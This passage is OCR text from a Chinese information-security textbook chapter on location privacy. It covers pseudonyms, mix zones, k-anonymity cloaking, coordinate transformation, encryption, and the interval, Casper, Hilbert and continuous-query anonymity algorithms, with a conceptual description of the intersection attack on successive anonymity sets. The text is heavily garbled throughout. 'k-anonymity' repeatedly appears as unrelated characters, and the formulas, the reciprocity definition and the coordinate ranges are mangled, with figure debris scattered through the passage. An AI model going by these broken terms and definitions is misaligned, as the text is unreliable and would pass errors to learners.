当 匿 名 运动 对 象 的 真实 位 置 对 位 置 服务 提供 商 可 见 时 ， 隐 私 保护 的 目标 可 能 就 是 隐 
藏 移动 用 户 的 真实 身份 。 用 户 的 真实 身份 可 以 是 姓名 , 一 个 独特 的 标识 符 ( 如 身份 证 号 ) 
或 任何 唯一 标识 用 户 的 属性 集 。 即 使 用 户 发 布 的 位 置信 息 中 未 明确 透漏 个 人 信息 ， 恶 意 
攻击 者 仍然 可 以 通过 数据 挖掘 、 关 联 分 析 等 方法 ， 利 用 位 置信 息 和 额外 上 下 文 数据 如 曾 
经 访问 的 对 象 等 来 尝试 推断 用 户 的 身份 。 

2. 空间 信息 

空间 信息 指 隐私 保护 的 目标 是 移动 用 户 的 位 置信 息 ， 在 提交 位 置信 息 给 位 置 服务 提 
供 商 时 ， 需 要 按照 预先 设 定好 的 精度 对 位 置信 息 进行 处 理 。 例 如 ， 一 个 用 户 可 能 向 他 的 
朋友 提供 精确 的 位 置信 息 ， 而 只 提供 城市 级 别 粗 粒度 位 置信 息 给 新 闻 订 阅 服务 。 一 般 来 
说 ， 这 一 目标 保护 方法 被 称 为 位 置 模糊 或 隐匿 。 另 外 ， 用 户 的 位 置信 息 通常 携 带 比 单纯 
的 几何 信息 如 精度 和 纬度 值 更 多 的 语义 信息 。 语 义 信 息 特 指 位 置信 息 的 危险 性 。 例 如 ， 
用 户 平时 共享 一 个 精确 的 位 置 可 能 没有 什么 问题 ， 只 要 他 不 进入 某 些 语义 位 置 如 医院 ， 
因为 这 可 以 用 来 获得 进一步 的 私人 信息 如 用 户 的 健康 状况 等 。 因 此 ， 保 护 空间 信息 的 特 
定 目标 实质 就 是 语义 位 置信 息 的 保护 。 例 如 ， 一 个 用 户 在 医院 内 ， 那 么 这 些 语义 信息 可 
能 就 需要 保护 。 

3. 时 态 信息 

在 某 些 应 用 场景 中 ， 空 间 信息 只 有 与 当前 的 时 间 信 息 关 联 起 来 才 是 危险 的 ， 此 时 隐 
私 保护 的 目标 就 是 用 户 空间 信息 有 效 的 时 间 点 或 时 间 段 ， 即 时 态 信息 。 例 如 ， 用 户 可 能 
愿意 与 朋友 分 享 他 在 何 处 旅行 ， 但 是 又 不 愿意 泄露 自己 超速 的 事实 。 在 这 种 情况 下 ， 用 
户 位 置信 息 不 能 实时 更 新 ， 需 要 暂时 推迟 以 实现 保护 目标 。 需 要 注意 的 是 ， 必 须 考虑 到 
即使 没有 明确 的 时 间 信 息 (位置 更 新 时 间 戳 ), 攻击 者 也 可 能 通过 位 置 服务 器 接收 到 信息 
的 时 间 以 及 位 置 更 新 算法 触发 更 新 等 进行 推导 。 通 常情 况 下 ， 用 户 可 能 想 要 控制 完整 的 
运动 轨迹 ， 以 实现 最 大 程度 的 隐私 保护 效果 。 


8.5.2 ”位 置 隐私 保护 常用 方法 


位 置 匿名 算法 的 作用 是 在 满足 用 户 隐私 需求 和 保证 服务 质量 的 前 提 下 保护 用 户 的 
位 置 隐私 。 我 们 可 以 形式 化 地 表示 位 置 服务 中 的 查询 请 求 : (id, location, query)。 其 中 ， 
id 表示 用 户 的 身份 ，location 表示 用 户 的 位 置 坐标 (x, y)，query 表示 查询 内 容 。 位 置 和 身 
份 是 用 户 的 直接 隐私 ， 能 够 标示 到 确定 的 个 体 对 象 ， 例 如 家 庭 住址 、 身 份 证 号 等 ;查询 
数据 是 用 户 的 间接 隐私 ， 虽 不 能 直接 确定 用 户 的 身份 ， 但 内 容 却 可 以 反映 出 用 户 的 生活 
环境 ， 例 如 工资 水 平 、 健 康 状况 等 。 位 置 隐私 保护 的 主要 目的 是 防止 或 减少 在 服务 提供 
系统 中 位 置信 息 的 可 识别 性 ， 目 前 没有 任何 一 种 隐私 保护 理论 模型 可 以 适用 于 所 有 的 应 
用 场景 ， 本 节 将 重点 讨论 以 下 几 种 常见 的 保护 方法 。 


so 
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1. 假名 技术 

在 位 置 隐私 保护 领域 ， 假 名 技术 包括 位 置 假名 和 身份 假名 两 个 研究 方向 。 位 置 假名 
指 用 户 用 几 个 虚假 的 位 置 代替 自身 所 处 的 真实 位 置 来 发 送 服务 请 求 。 在 这 类 位 置 隐私 保 
护 方法 中 ， 用 户 不 仅 向 位 置 服务 器 发 送 自己 的 真实 坐标 ， 而 且 以 一 定 的 策略 生成 一 组 假 
位 置 同时 发 送出 去 ， 这 些 假 位 置 可 以 起 到 掩护 真实 位 置 的 目的 。 真 假 位 置 在 位 置 服务 提 
供 端 是 无 法 区 分 的 ， 服 务 器 必须 查询 出 所 有 相关 位 置 的 服务 请 求 ， 返 回 候选 结果 集 ， 然 
后 由 用 户 根据 自身 的 真实 位 置 来 判断 所 需 的 服务 结果 。 显 而 易 见 的 是 ， 这 种 方法 增加 了 
服务 器 的 查询 处 理 开销 ， 同 时 要 求 用户 有 判断 结果 准确 性 的 能 力 。 
身份 假名 是 身份 匿名 的 一 种 特殊 形式 ， 它 的 主要 思路 是 让 用 户 在 发 送 位 置 服务 请 求 
时 采用 虚假 的 用 户 身份 来 代替 真实 的 用 户 身份 ， 这 样 也 就 使 得 服务 提供 商 无 法 收集 用 户 
身份 与 位 置 的 关联 关系 。 即 使 非法 攻击 者 通过 特殊 的 技术 手段 获得 了 用 户 的 位 置信 息 ， 
由 于 用 户 的 身份 是 虚假 的 ， 这 样 就 大 大 降低 了 真实 用 户 面临 的 安全 风险 。 

2. 混合 区 

在 假名 技术 的 基础 上 , 混合 区 (mix zone) 的 方法 用 于 保护 连续 发 布 位 置信 息 时 的 用 户 
身份 隐私 。 该 方法 将 用 户 访问 过 的 空间 区 域 分 为 两 种 类 型 : 应 用 区 域 和 混淆 区 域 。 在 应 
用 区 域 中 ， 用 户 可 以 提出 位 置 服务 请 求 和 接收 服务 信息 ; 在 混淆 区 域 中 ， 用 户 禁止 使 用 
基于 位 置 服务 ， 几 乎 没有 任何 通信 。 为 了 更 好 地 保护 用 户 的 位 置 隐私 ， 用 户 在 离开 混淆 
区 域 时 需要 更 换 自 己 的 假名 。 如 图 8-9 所 示 ， 实 例 中 给 出 了 一 个 拥有 三 个 用 户 的 混淆 区 
域 。 三 个 用 户 在 不 同时 刻 进 入 到 混淆 区 域 ， 使 用 的 假名 分 别 是 A、B 和 C。 当 他 们 离开 
该 区 域 后 ， 立 即 更 换 假名 为 X、Y 和 Z。 因 为 攻击 者 无 法 预测 用 户 在 混淆 区 域内 停留 的 
时 间 ， 并 且 用 户 在 混淆 区 域 中 没有 使 用 位 置 服务 ， 增 加 了 将 同一 个 用 户 前 后 使 用 的 假名 
关联 起 来 的 难度 。 这 样 非法 人 员 就 无 法 继续 追踪 目标 ， 从 而 达到 保护 用 户 身 份 信息 的 
目的 。 


图 8-9 混合 区 位 置 隐私 保护 技术 
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3. 大 匿名 

如 前 面 章 节 所 介绍 的 那样 ,匿名 是 一 个 通用 的 隐私 概念 , 而 不 限于 位 置 隐私 .Marco 
Gruteser 最 先 将 左 匿 名 模型 应 用 到 位 置 隐 私 保护 上 ， 提 出 位 置 大 匿名 (Location 
太 Anonymity) 的 概念 。 位 置 匿名 利用 大 匿名 的 思想 将 用 户 的 准确 位 置信 息 蔡 换 成 一 个 
空间 区 域 ， 在 该 空间 区 域内 至 少 存在 大 个 不 同 用 户 ， 这 样 使 得 提出 位 置 服务 请 求 的 用 户 
在 该 空间 区 域内 至 少 不 能 与 其 他 所 1 个 用 户 区 分 开 来 ， 从 而 保护 了 用 户 身份 隐私 。 结 合 
EAI, TERE 大 匿名 模型 中 ， 标 识 符 指 用 户 的 终端 ID( 如 电话 号 码 等 )， 敏 感 信 
息 包括 用 户 的 身份 信息 和 位 置 坐 标 等 , 可 能 的 准 标识 符 属 性 有 时 间 、 地 点 、 查 询 内 容 等 。 
有 关 位 置 匿名 模型 的 详细 介绍 见 下 一 节 。 

4. 模糊 空 间 和 坐标 变换 

模糊 空间 指 用 一 个 空间 区 域 来 代替 用 户 的 具体 位 置 坐标 ， 通 过 故意 降低 用 户 发 送 给 
位 置 服务 提供 商 的 位 置信 息 精 度 来 保护 隐私 。 区 域 的 形状 不 限 , 普遍 选择 圆 形 或 者 矩形 ; 
区 域 的 大 小 也 不 限 , 一 般 根据 用 户 的 隐私 保护 需求 和 服务 质量 要 求 确定 。 如 图 8-10 所 示 ， 
当前 用 户 A 的 真实 位 置 坐标 为 (xi, yi)， 如 果 采 用 距离 该 坐标 长 度 为 + 的 正方 形 作为 模糊 
空间 ， 则 用 户 的 位 置 就 变换 为 了 一 个 二 维 空间 区 域 [ ir Yes isr Vir) ]。 与 虚假 位 置 
方法 类 似 ,位置 服务 器 只 知道 用 户 在 这 个 模糊 空间 内 ， 而 无 法 得 知 真实 的 位 置信 息 。 由 
于 用 户 可 以 自己 定义 模糊 区 域 ， 所 以 这 种 方法 另 一 个 的 优点 在 于 提供 了 位 置 隐私 而 无 须 
可 信 第 三 方 。 然 而 与 这 种 优势 随 之 而 来 的 是 成 本 因素 ， 客 户 端 未 得 到 精确 的 用 户 位 置 。 
同样 地 ， 由 于 模糊 空间 降低 了 用 户 的 位 置 精度 ， 服 务 质量 会 根据 区 域 的 大 小 成 反比 例 下 
降 ， 并 且 该 方法 也 面临 服务 器 处 理 开销 增 大 的 问题 。 


图 8-10 ”模糊 空间 位 置 隐私 保护 技术 


坐标 变换 指 移动 用 户 在 发 送 给 位 置 服务 器 具体 位 置信 息 之 前 ， 对 它们 执行 一 些 简单 
的 几何 操作 移动 、 旋 转 等 )。 为 了 恢复 原始 位 置 ， 变 换 函 数 需要 分 配给 客户 端 。 否 则 ， 
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它 不 可 能 比较 不 同 用 户 的 不 同 变换 的 位 置 ， 例 如 执行 范围 查询 。 

5. 信息 加 密 

信息 加 密 技术 是 最 基本 的 安全 防护 方法 ， 通 过 将 明文 改变 成 不 可 读 的 密 文 ， 从 而 起 
到 保护 敏感 信息 的 目的 。 同 样 地 ， 信 息 加 密 的 方法 也 可 以 应 用 到 位 置 隐私 保护 领域 ， 由 
于 每 个 位 置信 息 的 处 理 和 查询 都 是 基于 密 文 的 ， 这 就 使 得 非法 攻击 者 无 法 解密 出 用 户 真 
实 的 位 置 和 身份 信息 。Mascetti 等 人 提出 的 方法 是 当 朋友 在 其 附近 时 通知 用 户 ， 无 须 向 
位 置 服务 提供 商 泄露 用 户 的 当前 位 置 。 为 此 ， 假 定 用 户 与 每 个 朋友 共享 一 个 密码 并 使 用 
对 称 加 密 技术 。 在 身份 隐私 保护 技术 中 ， 盲 签名 技术 也 十 分 具有 代表 性 ， 其 核心 思想 是 
用 户 对 要 签名 的 内 容 进行 盲 化 并 发 送 给 签名 者 ， 签 名 者 对 其 签名 后 发 送 给 用 户 ， 用 户 去 
言 后 能 得 到 正确 的 签名 ， 从 而 保护 用 户 要 签名 的 内 容 不 被 签名 者 获取 。 通 常 ， 对 加 密 方 
法 的 质疑 主要 来 自 于 基于 位 置 的 查询 ， 如 最 近邻 居 差 距 或 范围 查询 是 否 可 以 在 加 密 数据 
上 高 效 执行 。 

6. 位 置 分 享 

为 了 应 对 非 可 信 位 置 服务 提供 商 问题 ， 位 置 分 享 将 模糊 化 的 位 置信 息 分 割 成 所 谓 的 
“ 份 ”， 每 “ 份 ”都 有 严格 限制 的 位 置 精度 。 这 些 份 分 布 在 一 组 非 可 信 位 置 服务 提供 商 中 ， 
这 样 每 个 位 置 服务 提供 商 只 有 一 个 位 置 的 有 限 精度 ， 可 以 用 来 执行 计算 。 通 过 “ 份 ”组 
合算 法 ， 可 以 融合 获得 更 高 的 位 置 精 度 。 这 样 ， 取 决 于 可 访问 的 “ 份 数 ”， 客 户 端 可 以 提 
供 不 同 精度 级 别 的 位 置信 息 。 由 于 一 个 位 置 服务 提供 商 只 有 有 限 的 精度 信息 ， 具 有 故障 
弱化 的 特性 。 这 种 方法 的 优点 是 被 攻陷 的 位 置 服务 提供 商 不 能 泄露 全 部 位 置信 息 ， 因 为 
它 没有 所 有 必需 的 信息 。 缺 点 是 位 置 服务 提供 商 不 能 执行 复杂 计算 ， 如 范围 查询 。 


8.5.3 ”位 置 隐私 -匿名 算法 与 应 用 


基于 太 匿 名 的 位 置 隐私 保护 方案 是 当前 的 研究 热点 之 一 ， 迄 今 为 止 ， 在 位 置 匿名 处 
理 中 ， 使 用 最 多 的 模型 也 是 位 置 上 匿名 模型 。 具 体 地 说 ， 在 位 置 大 匿名 模型 下 ， 每 一 个 
用 户 的 位 置 以 一 个 三 元 组 表示 nlm SCH ly) 表示 移动 用 
户 所 在 的 二 维 空间 ，[4,&] 表 示 时 间 段 。([%, 叉 ],[73, 攻 上 [4 HR T H E t] 时 间 
段 的 某 一 个 时 间 点 去 出 现在 (4.2 Dy) 所 表示 的 二 维 空间 中 的 某 一 点 。 为 了 使 得 用 
户 集合 满足 位 置 匿名 ， 除 此 用 户外 ， 至 少 还 需要 其 他 大 1 个 用 户 也 在 此 时 间 段 内 的 某 
个 时 间 点 出 现在 (Maly) 的 二 维 空间 的 某 一 点 。 如 图 8-11 所 示 , 这 是 一 个 k=4 的 
位 置 大 匿 名 的 例子 (为 了 叙述 方便 ， 这 里 省 掉 了 时 间 域 )。 在 某 个 时 间 段 内 ， 共 有 四 个 
HP A, B, CHID 出 现在 (Drxzr]Do; 因 了 所 表示 的 二 维 空间 中 。 这 样 ， 经 过 位 置 匿 
名 后 ， 这 四 个 用 户 均 用 (az Dr) 表示 ， 如 表 8-4 所 示 ， 其 中 CVa) FETA AE 
形 框 的 左 小 角 坐 标 ，(xv,yr) 是 匿名 抑 形 框 的 右上 角 坐 标 。 因 为 用 户 在 匿名 框 中 任何 一 
个 位 置 出 现 的 概率 相同 ， 所 以 攻击 者 只 知道 在 此 区 域 中 有 4 个 用 户 ， 有 具体 哪个 用 户 在 哪 
个 位 置 无 法 确定 。 
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图 8-11 位 置 4- 匿 名 


表 8-4 位 置 4- 匿 名 的 结果 
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这 里 需要 说 明 的 一 点 是 ,，k 值 是 由 用 户 根据 需求 自己 定义 的 。 一 般 情况 下 ,，k 值 越 
大 ， 匿 名 框 也 越 大 ， 但 是 这 也 与 用 户 提出 服务 时 所 在 位 置 的 周围 环境 有 关 。 例 如 ， 某 个 
移动 用 户 提出 查询 请 求 时 要 求 二 100 的 匿名 度 ， 如 果 此 时 用 户 正 在 一 个 购物 广场 上 ， 那 
么 一 个 面积 很 小 的 空间 即 可 满足 匿名 需求 。 但 是 ， 如 果 用 户 此 时 在 沙漠 或 者 丛林 中 ， 则 
返回 的 匿名 空间 可 能 非常 大 ， 从 而 导致 服务 质量 的 下 降 。 

下 面 对 目 前 常用 的 三 种 位 置 大 匿名 算法 进行 介绍 : 间隔 匿名 算法 、Hilbert 匿名 算法 
和 连续 查询 匿名 算法 。 

1. 间隔 匿名 算法 

间隔 匿名 算法 的 基本 思想 为 可 信 第 三 方 匿名 服务 器 构建 一 个 四 又 树 的 数据 结构 ， 
将 二 维 空间 用 十 字 分 成 四 个 面积 相等 的 正方 形 区 间 ， 然 后 对 每 一 个 正方 形 再 递归 执行 相 
同 的 操作 ， 直 到 所 得 到 的 最 小 的 正方 形 区 间 的 面积 为 系统 要 求 的 允许 用 户 所 采用 的 最 小 
匿名 区 面积 为 止 ， 每 一 个 正方 形 区 间 对 应 于 四 又 树 中 的 一 个 节点 。 此 算法 要 求 系统 中 的 
所 有 用 户 每 隔 固定 的 时 间 将 自己 的 当前 位 置 坐标 上 报 给 匿名 服务 器 ， 匿 名 服务 器 更 新 并 
统计 每 个 节点 对 应 区 间 内 的 用 户 数量 。 当 某 个 用 户 进行 匿名 查询 时 ， 匿 名 服务 器 检索 当 
前 四 又 树 结构 ， 为 用 户 生成 一 个 匿名 区 。 具 体 来 说 ， 间 隔 匿名 算法 从 包含 用 户 的 四 又 树 
的 叶子 节点 开始 向 四 叉 树 根 的 方向 搜索 ， 直 到 找到 包含 不 低 于 个 用 户 的 节点 (包括 当 
前 用 户 在 内 )， 并 把 该 节点 所 对 应 的 区 域 作为 匿名 查询 用 户 的 一 个 匿名 区 。 

如 图 8-12 所 示 ， 如 果 用 户 u 发 起 k=2 的 匿名 查询 ， 间 隔 匿 名 算法 将 首先 搜索 到 象 
限 区 间 [(0,0),Q,D] ， 其 中 包含 的 用 户 数 少 于 2 个 ， 不 满足 匿名 要 求 。 然 后 ， 该 算法 继续 
向 根 的 方向 上 升 一 级 搜索 象限 区 间 [(0.0),(2,2)] ， 该 象限 区 间 包 含 3 MAN, 大 于 要 求 的 


B33 B 


E:F 


信息 安全 工程 师 教程 


2 个 ， 算 法 停止 搜索 ， 并 将 区 间 [(0,0),(2.2)] 作为 用 户 u 的 匿名 区 。 值 得 注意 的 是 ， 该 算 
法 所 得 的 匿名 区 所 包含 的 用 户 数量 可 能 远 远大 于 k， 因 此 会 加 大 位 置 服务 提供 商 的 查询 
处 理 负担 和 网 络 流量 的 负荷 。 


(0,4) (2,4) (4,4) 


(4,2) 


(0,0) (2,0) (4,0) 
图 8-12 间隔 匿名 算法 


为 了 解决 间隔 匿名 算法 对 位 置 服务 提供 商 负载 较 高 的 问题 ， 还 有 一 种 Casper 匿名 
(Casper cloak) 算法 。 该 算法 与 间隔 匿名 算法 类 似 ， 也 采用 了 四 又 树 数 据 结构 来 表示 二 
维 空间 ， 不 同 点 有 两 个 : @ 在 识别 和 访问 四 叉 树 的 叶子 节点 时 ，Casper 匿名 算法 直接 
通过 hash 表 来 完成 ; @ 在 对 节点 进行 搜索 时 ， 当 所 搜索 的 节点 不 满足 匿名 度 k 的 要 求 ， 
那么 该 算法 不 像 间隔 匿名 算法 那样 直接 搜索 其 父 节 点 ， 而 是 依次 检查 它 的 两 个 相 邻 的 兄 
弟 节点 和 它 所 组 合 起 来 的 区 间 中 所 包含 的 用 户 数量 是 否 大 于 等 于 k 如 果 满 足 则 直接 将 
组 合 区 间作 为 用 户 的 匿名 区 ， 和 否则 再 对 其 父 节点 进行 搜索 。 另 外 ，Casper 匿名 算法 允许 
每 个 移动 用 户 自由 地 决定 k 值 的 大 小 和 最 小 的 匿名 区 面积 。 如 图 8-12 所 示 ， 如 果 用 户 
u 发 起 k=2 的 匿名 查询 ，Casper 匿名 算法 将 首先 搜索 到 象限 区 间 [(0.0),(.D] ， 其 中 包含 
少 于 2 个 用 户 ; 然后 ， 先 检查 它 的 两 个 相 邻 兄弟 区 间 [(0.D,(2)] 和 [Q,0),(2,D)] ， 如 果 它 
们 中 的 一 个 与 自己 组 合 起 来 的 区 间 中 包含 的 用 户 数量 大 于 等 于 k， 则 直接 把 组 合 起 来 的 
矩形 区 间作 为 匿名 区 。 在 这 个 例子 中 矩形 [(0,0),(1,2)] 将 被 作为 匿名 区 。 与 间隔 匿名 算法 
相 比 ，Casper 匿名 算法 所 生成 的 匿名 区 平均 要 更 小 ， 从 而 提高 了 位 置 服务 器 的 查询 效率 

2. Hilbert 匿名 算法 

Hilbert 匿名 算法 也 称 作 小 集团 算法 〈clique cloak). Hilbert 变换 可 将 二 维 空间 映射 
到 一 维 空间 ， 并 保证 在 二 维 空间 内 较 近 的 点 对 变换 到 一 维 空间 也 是 较 近 的 。 要 想 理解 
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Hilbert 算法 ， 我 们 需要 了 解 互惠 主义 的 定义 。 

定义 1 互惠 主义 : WAS, (u) 表示 用 户 & 匿 名 度 为 大 的 匿名 集 ， 则 当 且 仅 当 一 个 匿名 
算法 同时 满足 以 下 两 个 条 件 时 ， 才 满足 互惠 主义 : 

(1) AS, (u) 至 少 包含 天 个 用 户 ; 

(2) E AS, (u) 中 每 一 个 用 户 w， 
同一 个 匿名 集 AS。 

Hilbert 匿名 算法 就 满足 这 个 性 质 。 该 算法 首先 对 所 有 的 用 户 进行 整理 ， 按 照 整 理 后 
的 顺序 将 相 邻 的 每 大 个 用 户 作为 一 组 。 这 样 ， 某 个 用 户 最 终 的 匿名 集 AS 就 是 包含 该 用 
户 的 组 内 的 所 有 用 户 , 通过 计算 匿名 集 的 最 小 绑 定 矩形 可 以 得 到 匿名 区 。 如 图 8-13 所 示 ， 
Hilbert 曲线 将 一 个 二 维 空 间 采 用 4*4 分 割 ， 如 果 用 户 由 发 出 一 个 k= 3 的 匿名 查询 ， 图 的 
下 面 是 创建 4 个 Hilbert 组 ， 即 4 个 伪装 区 域 ， 使 得 每 个 组 内 至 少 包 含 大 个 用 户 。 用 户 
u WER AS 包含 用 户 usuzus， 最 小 绑 定 矩形 及 匿名 区 如 图 中 阴影 所 示 。 


HHA AS, (u) = AS, (u), BY AS, 0) 中 所 有 的 用 户 有 


(0.4) (2.4) (4,4) 
uy uy 
e us e 
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(0,2) (4,2) 
@u, 
e 
" e. 
Ou, 
(0.0) (2,0) (4,0) 


he ral je 


B1 


3. 连续 查询 匿名 算法 


| me | 


B3 | 


图 8-13 Hilbert 匿名 算法 


B4 | 


在 普通 的 匿名 保护 算法 中 ， 用 户 每 次 发 起 查询 之 后 ， 第 三 方 匿名 服务 器 都 通过 匿名 
算法 将 用 户 泛 化 到 有 大 个 用 户 的 匿名 集 AS 中 ， 使 攻击 者 无 法 直接 从 匿名 集 AS 中 区 分 
出 真实 用 户 。 但 是 ， 一 旦 攻击 者 得 知 用 户 为 连续 查询 ， 就 可 以 采用 连续 攻击 模型 找 出 真 


实 查询 的 


Io WE 8-14 所 示 ， 假 设 某 个 用 户 分 别 在 全, 2} 时 刻 连续 发 送 了 位 置 查 


询 信 息 ， 并 且 当 前 系统 的 匿名 度 天 4， 则 攻击 者 在 任意 时 刻 攻击 匿名 服务 器 都 会 得 到 含 


Bo 
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有 四 个 用 户 的 匿名 集 。 在 本 例 中 ， 攻 击 者 按照 时 间 序 列 三 ,2} 发 起 攻击 ， 那 么 可 以 
得 到 用 户 匿名 集 分 别 为 {A,B,C,D}，{A,B,GH}，{A,C,E,Y}。 单 单 从 一 次 查询 中 ,攻击 者 
不 能 确认 是 匿名 集中 哪个 用 户 。 若 攻击 者 为 持续 监测 ， 可 以 通过 观察 不 同时 刻 的 匿名 集 
内 的 用 户 组 合 来 推测 是 哪个 用 户 发 送 了 查询 消息 。 有 具体 来 说 ， 攻 击 者 可 按时 间 序 列 将 相 
邻 的 匿名 集 做 取 交 处 理 ， 从 而 得 到 结果 序列 是 {A,B,C,D}，{A,B} 和 {A}， 由 此 可 推测 出 


发 送 消息 的 用 户 为 A。 
eee @r EEC S 
4 A ‘, ot, @r Pa a 
1 Iz S ‘ 
Po we | eae ee 
1 i 
\@ ec; i A : \ e: = i 
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图 8-14 连续 攻击 模型 


针对 这 种 连续 攻击 模型 ， 研 究 人 员 提 出 了 一 些 针 对 性 的 连续 查询 匿名 算法 。 下 面 介 
绍 一 种 利用 移动 用 户 的 历史 轨迹 进行 连续 大 匿 名 保护 的 匿名 算法 。 其 基本 思想 为 : 

(1) 位 置 匿名 服务 器 收集 众多 移动 用 户 的 历史 位 置 轨 迹 ， 保 存 到 轨迹 数据 库 中 。 随 
着 系统 中 每 一 位 用 户 的 移动 ， 不 断 地 将 新 的 运动 轨迹 添加 到 轨迹 数据 库 中 。 为 了 节省 空 
间 ， 可 以 将 时 间 过 长 的 运动 轨迹 删除 。 

(2) 当 移 动用 户 进行 匿名 查询 时 ， 匿 名 服务 器 首先 从 轨迹 数据 库 中 搜索 从 某 个 时 间 
起 与 查询 用 户 的 历史 运动 轨迹 大 致 相同 的 大 1 个 用 户 ， 然 后 通过 一 定 的 算法 对 这 大 1 个 
用 户 的 历史 运动 轨迹 进行 拟 合 处 理 。 在 拟 合 过 程 中 ， 由 于 轨迹 数据 库 中 存储 的 是 用 户 某 
个 时 间 点 的 位 置 ， 当 某 个 相近 的 轨迹 不 能 与 查询 用 户 的 轨迹 进行 拟 合 时 ， 还 要 对 该 轨迹 
进行 时 间 上 的 相应 的 插值 处 理 。 如 图 8-15 所 示 , 图 中 黑色 用 户 为 查询 发 起 用 户 的 历史 运 
动 轨迹 ， 假 设 匿 名 度 为 大 3， 则 白色 和 灰色 两 个 用 户 即 为 搜索 到 的 与 当前 用 户 运动 轨迹 
相似 的 运动 轨迹 ， 大 圆圈 为 生成 的 历史 匿名 区 。 


图 8-15 历史 运动 轨迹 拟 合 


(3) 将 
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区 到 的 k-1 个 用 户 作为 查询 用 户 的 匿名 集 AS, 并 且 该 用 户 以 后 的 所 有 匿名 查 


询 全 部 采用 该 匿名 集 AS, 根据 匿名 集 AS 中 用 户 的 当前 位 置 坐标 生成 初步 的 匿名 区 。 由 


于 匿名 集 AS 中 的 移动 用 户 的 运动 方向 和 速度 是 不 确定 的 ， 所 以 生成 的 匿名 区 可 能 会 因 


面积 相当 大 而 不 能 用 ， 这 时 可 以 采用 匿名 区 分 割 算法 将 初步 生成 的 匿名 区 进行 分 割 ， 从 


而 减少 匿名 


区 的 总 面积 ， 根 据 修改 后 的 匿名 区 进行 匿名 查询 。 


该 算法 的 思想 是 基于 过 去 运动 轨迹 相近 的 用 户 ， 那 么 现在 和 未 来 的 位 置 相近 的 概率 
会 很 大 的 现象 , 如 在 同一 公交 车 上 等 。 在 用 户 进行 匿名 查询 时 始终 采用 同一 个 匿名 集 AS 
来 生成 最 新 的 匿名 区 ， 这 样 从 根本 上 解决 了 一 个 移动 用 户 在 运动 过 程 中 采用 不 同 匿名 集 
AS 所 导致 的 不 同 匿名 集 AS 的 链接 攻击 。 然 而 ， 该 算法 也 有 无 法 实施 的 可 能 ， 假 如 所 求 
出 的 匿名 集中 的 移动 用 户 在 进行 匿名 查询 时 存在 离线 的 情况 ， 那 么 匿名 集 AS 中 的 用 户 


就 可 能 少 于 


大 个 ， 从 而 不 满足 匿名 化 要 求 。 


Bs 区 
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